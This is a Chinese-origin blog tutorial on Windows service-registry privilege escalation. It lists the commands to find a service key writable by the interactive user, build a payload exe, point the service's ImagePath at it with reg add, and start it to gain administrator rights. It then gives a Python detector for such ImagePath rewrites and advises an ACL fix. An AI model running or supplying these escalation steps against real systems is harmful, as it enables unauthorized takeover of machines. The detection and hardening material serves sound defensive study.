Registry privilege escalation

The principle of registry privilege escalation:
write a fake service through the registry and start that service; the fake service then runs our malicious code (the service runs with SYSTEM privileges).

NT AUTHORITY\INTERACTIVE is the identity of the current interactive user. If the registry ACLs are not configured properly, that identity can hold full control over a service's registry key.

```powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\* | select Path,AccessToString | Format-List > 1.txt
```

Search 1.txt for "NT AUTHORITY\INTERACTIVE" until you find an entry with Allow FullControl.

Then inspect that key's ACL (replace `a` with the service for which NT AUTHORITY\INTERACTIVE has Allow FullControl):

```powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\a | fl
```

Compile windows_service.c into an exe on Kali:

```shell
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
```

Copy it to the temp directory, then point the ImagePath of the service found above at the privilege-escalation exe:

```
reg add HKLM\SYSTEM\CurrentControlSet\services\a /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
```

Once that succeeds, start the forged service:

```
sc start a
```

`net user` now shows the account is already in the administrators group.
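From the defender's side, the step above (an interactive user rewriting a service's ImagePath to a binary in a user-writable directory) is visible in registry-write telemetry. The following is an added example, not code from the original post: a small detector that scans records shaped like Sysmon Event ID 13 (RegistryEvent SetValue) and flags ImagePath writes under `HKLM\SYSTEM\...\Services\` that point outside the directories a service binary is expected to live in. The field names follow Sysmon's schema; the event records, the service names and the trusted-directory list are constructed for the example.

```python
import re

# Constructed sample records in the shape of Sysmon Event ID 13 (RegistryEvent, SetValue).
# Field names follow Sysmon's schema; the values are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "CONTOSO\\alice", "Image": "C:\\Windows\\regedit.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\a\\ImagePath",
     "Details": "c:\\temp\\x.exe"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "%SystemRoot%\\System32\\spoolsv.exe"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VendorSvc\\ImagePath",
     "Details": "\"C:\\Program Files\\Vendor\\svc.exe\" -run"},
    {"EventID": 13, "User": "CONTOSO\\alice", "Image": "C:\\Windows\\regedit.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\a\\Start",
     "Details": "DWORD (0x00000002)"},
]

# Matches the ImagePath value of any service under the current or a numbered control set.
IMAGE_PATH_KEY = re.compile(
    r"^HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Services\\([^\\]+)\\ImagePath$",
    re.IGNORECASE)

# Directories a service binary is expected to live in (assumed list); anything else is flagged.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

ENV_VARS = {"%systemroot%": "c:\\windows", "%windir%": "c:\\windows",
            "%programfiles%": "c:\\program files",
            "%programfiles(x86)%": "c:\\program files (x86)"}


def executable_path(details: str) -> str:
    """Pull the binary out of an ImagePath value, which may be quoted and carry arguments."""
    d = details.strip()
    if d.startswith('"'):
        end = d.find('"', 1)
        return d[1:end] if end > 0 else d[1:]
    # Unquoted: take everything up to the first .exe/.sys followed by whitespace or end of string.
    m = re.match(r"(.+?\.(?:exe|sys))(?:\s|$)", d, re.IGNORECASE)
    return m.group(1) if m else (d.split() or [""])[0]


def normalize_path(path: str) -> str:
    """Lower-case and expand the variable and NT-style prefixes commonly seen in service paths."""
    p = path.strip().lower()
    for var, value in ENV_VARS.items():
        p = p.replace(var, value)
    if p.startswith("\\??\\"):
        p = p[4:]
    if p.startswith("\\systemroot\\"):
        p = "c:\\windows" + p[len("\\systemroot"):]
    return p


def audit_image_path_writes(events):
    """Return one finding per ImagePath write that points outside the trusted directories."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = IMAGE_PATH_KEY.match(ev["TargetObject"])
        if not m:
            continue  # some other service value (Start, ObjectName, ...), not the binary path
        binary = normalize_path(executable_path(ev["Details"]))
        if binary.startswith(TRUSTED_PREFIXES):
            continue
        findings.append({
            "service": m.group(1),
            "image_path": binary,
            "user": ev["User"],     # an interactive account here, not SYSTEM, is the tell-tale sign
            "writer": ev["Image"],
            "reason": "service ImagePath redirected outside trusted directories",
        })
    return findings


if __name__ == "__main__":
    for f in audit_image_path_writes(SAMPLE_EVENTS):
        print(f"[ALERT] service={f['service']} user={f['user']} "
              f"writer={f['writer']} path={f['image_path']}")
```

Run against the constructed records it reports only the rewrite of service `a` to `c:\temp\x.exe`; the Spooler and installer-written VendorSvc entries resolve into trusted directories and are ignored. The preventive counterpart is the ACL review already shown above: any service key whose DACL grants Allow FullControl (or SetValue) to INTERACTIVE, Users, Authenticated Users or Everyone should have that entry removed so that only SYSTEM and Administrators can write it.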


Origin blog.csdn.net/weixin_45682070/article/details/109905181